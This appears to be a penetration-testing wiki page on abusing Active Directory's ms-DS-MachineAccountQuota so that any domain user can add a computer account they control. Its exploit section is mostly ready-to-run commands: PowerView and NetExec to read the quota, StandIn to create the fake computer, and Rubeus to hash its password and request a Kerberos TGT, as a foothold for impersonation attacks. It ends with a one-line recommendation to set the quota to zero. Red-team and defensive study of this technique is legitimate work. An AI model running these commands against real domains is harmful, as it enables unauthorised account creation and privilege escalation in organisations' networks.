MachineAccountQuota Abuse

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit
4. Useful links
5. Recommendations

---

Vulnerability

By default, any domain user can add up to 10 computers into the domain they belong to. This feature is controlled by the attribute ms-DS-MachineAccountQuota. You can leverage this feature to add your own fake computer, one which you are local administrator. It could help you for impersonation attacks like S4U2Self Abuse or Kerberos Relay attacks.

Prerequisites

• Attribute ms-DS-MachineAccountQuota must be > 0 for a domain principal you control.

Exploit

The attribute ms-DS-MachineAccountQuota is generally set at the root level of the domain. To check its value, use one of the following commands.

# Replace with the appropriate Dinstinguished Name.
Get-DomainObject -Identity "DC=$sub,DC=$company,DC=$com" -Properties ms-DS-MachineAccountQuota

# Using NetExec.
nxc ldap -d $Domain -u $Username -p $Password -M maq

If you can a new computer account to the domain, use StandIn to do it.

# Generate the fake computer and add it to the domain.
./StandIn.exe --computer $ComputerName --make

# Compute hashes of the newly created computer.
./Rubeus.exe hash /password:$NewComputerPassword /user:$ComputerName$ /domain:$domain

# Ask a TGT for it.
./Rubeus.exe asktgt /user:$ComputerName$ /aes256:$hash /nowrap

Useful links

• If you observe a strange behavior with StandIn, take a look at GetDomain vs GetComputerDomain vs GetCurrentDomain from Rasta Mouse.

Recommendations

• Set ms-DS-MachineAccountQuota to 0 for all domain users if possible, or at least for unprivileged users.